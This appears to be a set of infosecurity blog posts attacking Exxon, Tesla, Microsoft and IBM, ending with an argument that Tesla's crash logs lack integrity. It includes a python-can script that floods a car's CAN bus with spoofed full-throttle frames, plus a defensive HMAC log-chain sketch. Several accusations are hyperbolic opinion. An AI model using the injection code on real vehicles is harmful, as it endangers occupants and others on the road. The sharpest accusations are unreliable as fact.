“We’ve dug into not just the language, the rhetoric in these documents, but also the data. And I’d say in that sense, our analysis really seals the deal on ‘Exxon Knew,'” Supran said. It “gives us airtight evidence that Exxon Mobil accurately predicted global warming years before, then turned around and attacked the science underlying it.”
[…]
“It was clear that Exxon Mobil knew what was going on,” Wuebbles said. “The problem is at the same time they were paying people to put out misinformation. That’s the big issue.”
There’s a difference between the “hype and spin” that companies do to get you to buy a product or politicians do to get your vote and an “outright lie … misrepresenting factual information and that’s what Exxon did,” Oreskes said.
Is there really a difference? Exxon is using disinformation to get people to buy its products and put its politicians into office.
Maybe outright lies used to be different back in the WWI Propaganda Office days of Woodrow Wilson, but by the 1930s (e.g. the inexplicable rise of petroleum cars instead of electric at that time) it surely had become the same thing.
Here’s an example from Texas of how roads became far less safe as more Teslas were introduced, necessitating expensive infrastructure upgrades to save lives.
When he reached Pierce Street, a Tesla turned the corner and drove into the bike lane. First, though, the vehicle hit the concrete barriers protecting the lane, bouncing over them, the force of the impact reduced before Fincham was hit and thrust across the Tesla’s hood.
The crash broke Fincham’s ribs, badly bruised his body and left a permanent scar on his hand, but he made a full recovery.
“I’m walking around because of the infrastructure,” he told the editorial board recently.
That can’t be said for hundreds of other Houstonians, some of their deaths, and lives, memorialized by “ghost bikes” solemnly adorning street corners throughout town.
I’m not exaggerating about Tesla. The company wouldn’t exist without fraud. It’s become a public nuisance.
In February of 2022 their latest “Full Self-Driving” was proven yet again to be the opposite of what was promised, nearly crashing into a cyclist.
A video trying to highlight Tesla FSD’s safety benefits instead captures a scary near-miss with a cyclist.
You may remember the crazy 2013 case from a decade ago, which now seems like ominous foreshadowing.
A 63 year-old retiree driving a new Tesla Model S last November crossed a double yellow line, drove up a hill, drove down a hill, and finally crashed into bicyclist Joshua Alper, killing him as a result. […] Jain has been charged with misdemeanor vehicular manslaughter in Alper’s death, and not a felony, because he “did not act in a reckless way” according to the report.
That driver wasn’t charged with a felony despite falling asleep at the wheel after… he claimed his Tesla had intoxicated him.
The Tesla CEO then falsely cited this case as the reason he created Autopilot, promoting it as safe for drivers falling asleep and thus encouraging Jain-like intoxicated driving.
Source: Twitter
Think for a minute how incredibly deceitful and malicious Tesla’s CEO is — developing automation for harm while claiming it’s for safety. He claimed that one bicyclist death by a sleeping driver was his inspiration for Autopilot, which ever since has been implicated in drivers killing more and more people!
10 out of 10 “Driverless” Fatalities Were Caused by Tesla
He falsely promoted the claim that “Autopilot would have prevented cyclist killed,” despite people correctly sounding the alarm that his Autopilot was only a lane assist and thus blind to cyclists sharing the lane.
Source: Twitter
That “idiot” was exactly right: Autopilot was a huge lie. Intermittent lane assist is a nightmare for cyclists, as I explained recently. It was truly tragic foreshadowing of the deaths ahead.
2021: Fell asleep (as instructed by the Tesla CEO) and, when approaching a curve, [Autopilot] crossed into the oncoming traffic lane and struck a pole on the opposite shoulder.
Tesla didn’t just do the opposite of what it shamelessly promoted; it did something even worse. Lately it has been proven to make drivers perform worse than if they drove other cars, not least because of a CEO repeatedly making false and misleading statements.
“Fred averaged 10,000 miles per year on his bike and with his wife by his side had cycled across America, Australia, Argentina, Chile, New Zealand, and a host of European countries in his retirement years,” [until a Tesla sharing the lane ran over him on a straight road].
The rider was cycling along 56th Avenue when a Tesla hit from behind.
Hit from behind? These avoidable deaths are a Tesla thing, apparently, part of a new design that removes safety features to increase car profits. One biker was killed July 7, 2022 and another on July 24.
Michael Brooks, acting executive director of the nonprofit Center for Auto Safety, called on NHTSA to recall Tesla’s Autopilot because it is not recognizing motorcyclists, emergency vehicles or pedestrians. “It’s pretty clear to me, and it should be to a lot of Tesla owners by now, this stuff isn’t working properly and it’s not going to live up to the expectations, and it is putting innocent people in danger on the roads,” Brooks said.
Owners? Last but not least, in 2021 a surgeon used his Tesla as a weapon to murder a cyclist, spattering himself in blood:
Henkin, who turned 59 on Tuesday, told police the Model S was a loaner vehicle owned by Tesla and he was on his way to work. He said he believed he was traveling the speed limit, which he thought to be 35 or 40 mph, records say. [The posted limit was 20]. The next day, Tampa police Detective James Snell wrote up a warrant affidavit for Henkin’s arrest on a vehicular homicide charge. In an affidavit seeking a search warrant for the Tesla’s event data recorder, Snell wrote that he used a “time/distance analysis” of the video to determine the car was traveling in excess of 100 mph just prior to the crash. Data from the event recorder showed the car was moving about 83 mph a half-second before impact, records say.
…given the number of Model 3s you’re likely to see blasting down narrow side streets in the Heights these days, Tesla probably needs as many spare parts for its Houston customers as it can get.
Honestly I figured Texas would have gone that route (pun intended) with some kind of Tesla hunting license. It’s reached a point where non-gun-owning residents probably should apply for a permit to not own and operate a firearm.
On my last trip there, as I skinned a bloody buck from a successful hunting trip, I was told that we’re serving an obligation to kill deer because they’re a public nuisance.
It got me thinking that there definitely are too many Teslas, and their owners often intend harm, if not just public nuisance…
So color me surprised that this state with the most guns is investing in public infrastructure instead, as if Texas wants to become a civilized society or something and protect people from Teslas.
A Tesla Model 3 crashed into a bicycle in 2021. Would stronger infrastructure have prevented injuries?
The “Moral Rating Agency” (MRA) isn’t impressed with companies driving through loopholes to profit on Russia’s invasion of Ukraine.
…Microsoft Corp… on the Moral Rating Agency’s ‘Hall of Shame’ of companies still allegedly involved in Russia, ranked according to the Agency’s “moral rating.”
MarketWatch says the MRA was set up specifically to examine the integrity of companies pledging to exit Russia, using a moral algorithm.
Its latest research argues Microsoft has dropped significantly from its 2022 “faint-hearted chicken” rating and now ranks among the worst companies supporting Russian aggression.
In March, shortly after Russia launched its invasion of Ukraine, Microsoft announced the suspension of all new sales of products and services. In June the software giant said it is significantly scaling down its operations in Russia, but would fulfill its existing contractual obligations to customers in the country, according to Reuters.
To recap, Microsoft announced in September 2022 it was working with Russian officials to meet their requirements.
And soon after that Russian media thanked Microsoft for providing new software and support.
…at the end of 2022 and that as of this week, updates for at least Windows 11 could be downloaded and installed by folks in Russia. “As we shared previously, we have stopped all new product and services sales in Russia and are complying with sanctions from the EU, UK and US,” Microsoft told The Register in a statement. So, updates… are OK, then? Got it.
No new software sales. Only new software. That’s a curious loophole.
IBM’s Watson was instrumental in the Nazi Holocaust, as he and his direct assistants worked with Adolf Hitler to help ensure genocide ran on IBM equipment.
IBM was so obsessive about these genocide contracts that it demanded the U.S. government ensure machines be retrieved from Germany and returned with full payment (from seized German funds) for services delivered to Hitler.
This shouldn’t be news to anyone, yet the fact that IBM could still name anything Watson is proof that it’s still news to everyone.
IBM maintained a customer site, known as the Hollerith Department, in virtually every concentration camp to sort or process punch cards and track prisoners. The codes show IBM’s numerical designation for various camps. Auschwitz was 001, Buchenwald was 002; Dachau was 003, and so on. Various prisoner types were reduced to IBM numbers, with 3 signifying homosexual, 9 for anti-social, and 12 for Gypsy. The IBM number 8 designated a Jew. Inmate death was also reduced to an IBM digit: 3 represented death by natural causes, 4 by execution, 5 by suicide, and code 6 designated “special treatment” in gas chambers. IBM engineers had to create Hollerith codes to differentiate between a Jew who had been worked to death and one who had been gassed, then print the cards, configure the machines, train the staff, and continuously maintain the fragile systems every two weeks on site in the concentration camps.
Are the “Gates” of hell what we should call Microsoft’s contractual obligations to Russia?
That should be straightforward enough for Microsoft to be investigated and held accountable… unlike IBM, which still uses the “Watson” brand after his exposed role in genocide.
Thomas Watson chose to tabulate the Nazi census, to accept Hitler’s medal, and to fight for control of Dehomag. And he made other equally indefensible choices in his years of doing a profitable business counting Jews for Hitler…
IBM’s decisions and role are indefensible.
Morality may be more complicated for Microsoft, in ways the MRA calculator above didn’t consider. Let’s suppose a software company today supplies backdoors and remote control through updates entering Russian territory.
After all, Russia itself demanded Microsoft treat the country uniquely. Request granted?
In that sense, every Russian system taking updates from Microsoft now may be totally compromised by American military intelligence. And at the same time Russian systems not taking updates from Microsoft also may be… compromised.
We’re talking about Microsoft, after all. And war. And everyone in Russia surely knows the danger of “using” Windows.
It’s complicated.
My money is on Microsoft aiding America with what it wants, by giving Russia what it doesn’t understand.
That algorithm seems beyond the MRA, obviously, but the real proof would be Microsoft pushing code that (even indirectly) stops Russia torturing abducted children, let alone prevents Russia’s wider war crimes and its constant bombing of civilians.
“It looks like it was trying to board a ferry and suddenly accelerated into the gate, basically destroying the Tesla,” said McLean. “We don’t know what caused it to happen,” said McLean, adding police are initially looking at either a mechanical issue, or a matter concerning the driver, which may have caused the sudden acceleration.
There’s a twist to the story.
“There was no vessel in the berth at the time of the incident. The vehicle was not attempting to board a ferry.” […] Typically, in order for a vehicle to get to the ferry ramps it would have to have been authorized to board a ferry, so it remains unclear if the vehicle was intending to board at another ramp but ended up accelerating toward one that had no ferry.
It brings to mind the crash video from China that shows brake lights illuminated, while Tesla insisted the brakes were never used.
Tesla also claims that the driver never pressed the brakes. Pictures from public cameras show that this is not true: the brake lights are clearly on at least one occasion without any obstacles ahead…
It’s a very old problem, and Tesla routinely accuses its customers of stepping on the “wrong” pedal continuously and at 100%, such as in a recent case where a family drove into a pool.
The big problem with Tesla’s analysis, of course, is that its logs may simply have no integrity (especially when compared with other brands). The logs are fallible. So when you read a statement like the one below, ask yourself whether the log may record what the car thought and NOT what the driver actually instructed.
Data shows that the vehicle was traveling at 6 mph when the accelerator pedal was abruptly increased to 100%. Consistent with the driver’s actions, the vehicle applied torque and accelerated as instructed.
That phrase “consistent with the driver’s actions” seems wrong. Why would someone write it that way? It gives the impression that they started with that assumption and then just looked for some sloppy way to prove it.
What if the pedal system increased to 100% in contradiction to the driver’s actions?
I’m not speaking hypothetically but from experience. I’ve been able to inject bogus commands into cars over the CAN bus, even exploiting race conditions. Sending 100% accelerator signals that then land in the logs begs the question whether any real proof exists of a connection to the physical pedal.
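To make that concrete, here is a minimal sketch of the kind of injection I mean, written with the open source python-can library against a Linux SocketCAN interface. The arbitration ID, payload layout, and timing are hypothetical stand-ins (real pedal message formats are proprietary and vary by vehicle); the point is only that any node on the bus can emit frames indistinguishable from the pedal sensor’s own.

```python
# Hypothetical sketch: spoofing an accelerator-position frame on a CAN bus.
# The arbitration ID (0x2F1) and payload encoding are made up for
# illustration; real pedal messages are proprietary and differ per vehicle.
import time
import can

bus = can.interface.Bus(channel="can0", interface="socketcan")

# In this imaginary encoding, byte 0 carries pedal position 0-255,
# so 0xFF would be logged as "accelerator pedal at 100%".
spoof = can.Message(
    arbitration_id=0x2F1,
    data=[0xFF, 0x00, 0x00, 0x00],
    is_extended_id=False,
)

# Flood the bus faster than the real pedal sensor broadcasts, so the
# spoofed value wins the race and is what downstream modules (and logs) see.
while True:
    bus.send(spoof)
    time.sleep(0.005)  # roughly 200 frames per second
```

A downstream log would then faithfully record “accelerator pedal at 100%” even though no foot ever moved, which is exactly why a log entry alone proves nothing about the physical pedal.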
You’ve heard of phantom braking. Why not phantom breaking… from unintended acceleration?
NHTSA opened a formal investigation in February 2022 regarding phantom braking incidents. The investigation includes 2021-2022 Tesla Model 3 and Model Y vehicles, and by May 2022, the government knew of more than 750 unintended sudden braking incidents.
Allegedly this is why some Tesla owners think they need a camera on the floor recording their foot positions.
A better solution would be for the logs to go to the owner, who could then regularly test them and validate integrity controls.
With the brake lights in the video contradicting Tesla’s overconfident statement (based on its own logs) that the brakes weren’t applied, you see the problem. With the logs always sent to the owner’s personal data storage, and with regular integrity tests, you’d definitely see the problem.
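What could such an integrity test look like? One standard approach (a sketch under an assumed key-sharing model, not anything Tesla actually ships) is a keyed hash chain: each log record carries an HMAC over its contents plus the previous record’s tag, so any after-the-fact edit, deletion, or reordering breaks the chain when the owner verifies their copy.

```python
# Sketch of a tamper-evident log chain the owner could verify locally.
# Field names and the owner-provisioned key are assumptions for illustration.
import hashlib
import hmac
import json

def tag(key: bytes, record: dict, prev_tag: bytes) -> bytes:
    """HMAC over the serialized record chained to the previous tag."""
    payload = json.dumps(record, sort_keys=True).encode() + prev_tag
    return hmac.new(key, payload, hashlib.sha256).digest()

def verify_chain(key: bytes, records: list[dict], tags: list[bytes]) -> bool:
    """Recompute every tag; any edited, dropped, or reordered record fails."""
    prev = b"\x00" * 32  # agreed genesis value
    for record, expected in zip(records, tags):
        computed = tag(key, record, prev)
        if not hmac.compare_digest(computed, expected):
            return False
        prev = computed
    return len(records) == len(tags)

# Example: the owner replays a vendor-supplied log against the shared key.
key = b"owner-provisioned-secret"  # assumed key escrowed to the owner
records = [{"t": 0.0, "accel_pct": 4}, {"t": 0.5, "accel_pct": 100}]
tags = []
prev = b"\x00" * 32
for r in records:
    prev = tag(key, r, prev)
    tags.append(prev)
assert verify_chain(key, records, tags)

records[1]["accel_pct"] = 4                  # tamper with the suspicious entry
assert not verify_chain(key, records, tags)  # verification now fails
```

A chain like this can’t prove the sensor reading was true, but it does prove nobody rewrote the record afterward, which is exactly the assurance missing when a vendor quotes its own unverifiable logs.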
a blog about the poetry of information security, since 1995